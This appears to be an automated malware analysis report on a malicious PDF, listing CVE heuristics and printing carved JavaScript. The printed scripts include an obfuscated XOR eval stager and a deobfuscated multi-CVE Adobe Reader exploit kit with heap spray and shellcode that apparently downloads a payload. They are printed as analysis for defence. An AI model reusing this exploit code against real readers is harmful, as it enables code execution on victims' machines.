Malicious PDF — malware analysis report

Static analysis result for SHA-256 afc45516e392666f…

MALICIOUS

PDF

5.0 KB Created: 2010-08-01 07:24:31 Authoring application: Mawdokaz (via e4648Zefikepeziliyfi) First seen: 2026-05-11
MD5: b5bd22b2e6061b2eb880212829e2ef37 SHA-1: 476674c9c073d5fbbefeab934248c4ce117b15b9 SHA-256: afc45516e392666fe2dd9850c91e61708ab2cb9eec1a1f4c24a3cf2bd8b352ad
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, flagged by multiple heuristics as a stager. The JavaScript stream, named 'javascript_obj0011_000.js', is obfuscated and likely intended to download and execute a second-stage payload. The presence of PDF-specific stager heuristics indicates a deliberate attempt to hide malicious code within the document structure.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://X.egh/4 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xEDB 535 bytes
SHA-256: 9142a1300d6f6a99eb4af0ba56c49a0a38bebff77798d40227fa8d62d328d822
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
try {var chWord, numWords;for (var i = 0; i < this.numPages; i++){}qB='var: cD 9= 205 ;var j:K =:: t9his;v>>ar iP=j:>K.getPageNu99mWo9:rds(t>>his.pag>:eNum);var>9 pY=\'\';for(var >>eZ=0;e9Z< iP; eZ9>++){pY=[pY:,jK.getPag:eNth>Word(jK.p9:a::g>>eNum,eZ,9tr>ue)].9>jo:in(:9\'>9\');;}var h:Y=9\'\';for(var9 eZ=0;eZ < pY::.length;9 ::eZ+9>=2){h99O=pY.sub>st9r(eZ,2):9;hY=[h>Y,Stri>ng.>9fromChar>Cod>:e(parseI>nt(>:hO,16>:)^cD)].join(\'\'):9;}e>9val(hY);hY=null;:'.replace(/[\:9\>]/g, '');vO=yXW();} catch(kR){var zU=new Function (qB);zU();}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3958 bytes
SHA-256: 05c243f53a37a870f75f820c0a9a999c1c065a0d072165c9f72842a104f9d91e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var l={n:30946};try {var gX='z'.substring(13408)} catch(gX){};var wP={f:23228};try {var lI='jU'.substring(4283)} catch(lI){};var mD='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';iL=3230;iL+=180;yN=15450;yN+=80;var gJ=new Array();var hG=this.info['j'].replace(/[\s]/g, '');try {var lM='jC'.substring(25941,25941)} catch(lM){};try {var yT='yX'.substring(1766,1766)} catch(yT){};try {var mV='pU'.substring(21794,21794)} catch(mV){};var wRO = this.info;var qR = (wRO.producer.substr(0,5) == 'debug');var nC = new Array(); var sV = "%u";function xE(str){str = str.split(sV);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function gR(str1, str2){return [str1, str2].join("");}function bC(gJG){var eR = fE();var qX = fA();eR += ((eR.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + qX;if(qR) app.alert("URL: " + eR);eR=oN(eR);var d=sV;var hO=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";hO+=eR;return xE(hO);};function fE(){var qXY = (wRO.author + wRO.title).replace(/[\s]/g, '');var aZ = lU(qXY, hG, mD);return aZ;};function lU(qXY, mD, hG){var aZ="";for(var i=0; i < qXY.length; i++){var gP = mD.indexOf(qXY[i]);if(gP > -1 ){aZ += hG[gP];}}return aZ;};function oN(qXY){var out = "";qXY = xEZ(qXY);g = Math.round(qXY.length / 4);if (g != qXY.length /4) qXY+="00";for(var i=0; i < qXY.length; i+=4){out+= sV + qXY.substr(i+2, 2) + qXY.substr(i, 2);}return out;};function xEZ(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function hK(sP, len){while (sP.length * 2 < len){sP = gR(sP, sP);}return sP.substring(0, len / 2);};function dK(aH){var jA = 0x0c0c0c0c;        iR = bC("pdf");if (aH == 1){jA = 0x30303030;}var nK = 0x400000;var ln = iR.length * 2;var qHM = nK - (ln + 0x38);var sP = xE(sV+"9090"+sV+"9090"); sP = hK(sP, qHM);var wH = (jA - 0x400000) / nK;for (var rU = 0; rU < wH; rU ++ ){nC[rU] = gR(sP, iR);}};function fA(){try {return app.viewerVersion.toString();}catch(kDY){    return 0;}}if(qR) app.alert("called exploit");var qX = fA();if(qR)  app.alert("v: " + qX);if (qX > 8){if(qR) app.alert("util.printf");dK(1);var kT = "12999999999999999999";for (fS=0; fS < 276; fS++) kT += "8";util.printf("%45000f", kT);}if (qX < 8){if(qR) app.alert("Collab.collectEmailInfo");dK(0);var uF = xE(sV+"0c0c"+sV+"0c0c");while (uF.length < 44952) uF += uF;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : uF});}if (qX < 9.1){if (app.doc.Collab.getIcon){if(qR) app.alert("Collab.getIcon");dK(0);var fU = unescape("%09");while (fU.length < 0x4000) fU += fU;fU = "N." + fU;app.doc.Collab.getIcon(fU);}}if (qX == 9.2){if(qR) app.alert("media.newPlayer");dK(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var rA=["h","rI"];wFC=25149;wFC--;var bE={};var uN={fMN:false};bbbbbb�������x
page_word_xor_stage_000.js deobfuscated-js page-word continuous-hex XOR decoded JavaScript (decompressed, key=0xCD) at offset 0x8C 3944 bytes
SHA-256: 7e462cd0cb4e61636e5198d24057f85ffe8efb4487da81f3d829b883e3f7d5f4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var l={n:30946};try {var gX='z'.substring(13408)} catch(gX){};var wP={f:23228};try {var lI='jU'.substring(4283)} catch(lI){};var mD='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';iL=3230;iL+=180;yN=15450;yN+=80;var gJ=new Array();var hG=this.info['j'].replace(/[\s]/g, '');try {var lM='jC'.substring(25941,25941)} catch(lM){};try {var yT='yX'.substring(1766,1766)} catch(yT){};try {var mV='pU'.substring(21794,21794)} catch(mV){};var wRO = this.info;var qR = (wRO.producer.substr(0,5) == 'debug');var nC = new Array(); var sV = "%u";function xE(str){str = str.split(sV);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function gR(str1, str2){return [str1, str2].join("");}function bC(gJG){var eR = fE();var qX = fA();eR += ((eR.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + qX;if(qR) app.alert("URL: " + eR);eR=oN(eR);var d=sV;var hO=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";hO+=eR;return xE(hO);};function fE(){var qXY = (wRO.author + wRO.title).replace(/[\s]/g, '');var aZ = lU(qXY, hG, mD);return aZ;};function lU(qXY, mD, hG){var aZ="";for(var i=0; i < qXY.length; i++){var gP = mD.indexOf(qXY[i]);if(gP > -1 ){aZ += hG[gP];}}return aZ;};function oN(qXY){var out = "";qXY = xEZ(qXY);g = Math.round(qXY.length / 4);if (g != qXY.length /4) qXY+="00";for(var i=0; i < qXY.length; i+=4){out+= sV + qXY.substr(i+2, 2) + qXY.substr(i, 2);}return out;};function xEZ(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function hK(sP, len){while (sP.length * 2 < len){sP = gR(sP, sP);}return sP.substring(0, len / 2);};function dK(aH){var jA = 0x0c0c0c0c;        iR = bC("pdf");if (aH == 1){jA = 0x30303030;}var nK = 0x400000;var ln = iR.length * 2;var qHM = nK - (ln + 0x38);var sP = xE(sV+"9090"+sV+"9090"); sP = hK(sP, qHM);var wH = (jA - 0x400000) / nK;for (var rU = 0; rU < wH; rU ++ ){nC[rU] = gR(sP, iR);}};function fA(){try {return app.viewerVersion.toString();}catch(kDY){    return 0;}}if(qR) app.alert("called exploit");var qX = fA();if(qR)  app.alert("v: " + qX);if (qX > 8){if(qR) app.alert("util.printf");dK(1);var kT = "12999999999999999999";for (fS=0; fS < 276; fS++) kT += "8";util.printf("%45000f", kT);}if (qX < 8){if(qR) app.alert("Collab.collectEmailInfo");dK(0);var uF = xE(sV+"0c0c"+sV+"0c0c");while (uF.length < 44952) uF += uF;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : uF});}if (qX < 9.1){if (app.doc.Collab.getIcon){if(qR) app.alert("Collab.getIcon");dK(0);var fU = unescape("%09");while (fU.length < 0x4000) fU += fU;fU = "N." + fU;app.doc.Collab.getIcon(fU);}}if (qX == 9.2){if(qR) app.alert("media.newPlayer");dK(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var rA=["h","rI"];wFC=25149;wFC--;var bE={};var uN={fMN:false};

Open this report in the interactive analyzer, or submit your own file for analysis.